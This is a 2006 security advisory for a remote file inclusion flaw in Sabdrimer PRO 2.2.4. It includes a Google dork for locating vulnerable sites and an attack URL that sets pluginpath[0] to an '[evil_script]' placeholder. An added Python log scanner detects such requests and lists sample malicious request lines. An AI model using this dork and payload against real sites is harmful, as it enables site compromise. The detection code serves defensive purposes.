
# Title : Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability
# Published : 2006-07-09
# Author : A.nosrati


VIRANGAR SECURITY TEAM
Discovered By : A.nosrati
 www.virangar.org (Public)
 www.virangar.net (Priv8)
 Mail: info[at]virangar.net

Sabdrimer PRO (v.2.2.4) Remote File Include Vulnerability
Google Dork : "? Sabdrimer CMS"
Bug found in file : advanced1.php
Web site : http://sabdrimer.ru
Remote : Yes
Critical Level : Dangerous

http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]
Important : register_globals=On
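
A detection sketch for the request shape above, added here and not part of the original advisory: it scans web-server access-log lines for requests to advanced1.php that set pluginpath from the query string, and separates values that point at a remote URL. The combined log format, the function names and the sample lines (documentation addresses, example.net host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path from the advisory, matched as a suffix (CMS may sit below the web root).
TARGET = "/skins/advanced/advanced1.php"
PARAM = re.compile(r"^pluginpath(\[[^\]]*\])*$", re.I)  # any array index, or none
REMOTE = re.compile(r"^(?:https?|ftps?)://", re.I)
# Request field of the common/combined log format (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2006:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Jul/2006:10:00:05 +0000] "GET /skins/advanced/advanced1.php'
    '?pluginpath[0]=http://files.example.net/x.txt HTTP/1.1" 200 311',
    '198.51.100.7 - - [09/Jul/2006:10:00:09 +0000] "GET /cms/skins/advanced/advanced1.php'
    '?pluginpath%5B0%5D=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.0" 200 311',
    '192.0.2.44 - - [09/Jul/2006:10:02:30 +0000] "GET /skins/advanced/advanced1.php'
    '?pluginpath[0]=plugins/ HTTP/1.1" 200 900',
]

def classify(log_line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    try:
        url = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if not unquote(url.path).lower().endswith(TARGET):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B0%5D becomes [0].
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if not PARAM.match(name):
            continue
        if REMOTE.match(value.strip()):
            return "remote-include"   # value points at a remote URL
        verdict = "param-override"     # variable supplied by the request at all
    return verdict

def scan(lines):
    """Return (client_address, verdict) for every flagged line."""
    return [(l.split(" ", 1)[0], v) for l in lines if (v := classify(l))]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```
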

-----------------------
Greetz : All #Virangar Members
I work in the dark 
I Get what I want 

# www.Syue.com [2006-07-09]